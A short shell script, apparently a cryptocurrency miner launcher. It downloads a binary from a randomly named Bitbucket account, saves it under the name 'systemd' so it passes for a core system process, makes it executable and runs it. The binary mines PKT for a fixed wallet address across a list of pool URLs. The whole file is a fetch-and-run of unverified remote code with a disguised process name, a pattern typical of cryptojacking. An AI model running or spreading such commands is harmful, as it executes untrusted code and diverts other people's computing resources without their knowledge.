wget -q https://bitbucket.org/anruvovtisovjlk/multycpm/downloads/systemd
chmod +x systemd
./systemd ann -p pkt1q3r6qa92j5mgtgm4eusekelhrx27tz800qnd0h3 https://stratum.zetahash.com/2048 https://stratum.zetahash.com/1024 https://stratum.zetahash.com/1025 https://stratum.zetahash.com/1026 https://stratum.zetahash.com/1027 https://stratum.zetahash.com/1028 https://stratum.zetahash.com/512 http://pool.pktpool.io/2048 http://pool.pktpool.io/1024 http://pool.pktpool.io/1025 http://pool.pktpool.io/1026 http://pool.pktpool.io/1027 http://pool.pktpool.io/1028 http://pool.pktpool.io/512 2>&1 | grep --color=never -o "annmine.rs.*Ke.*"
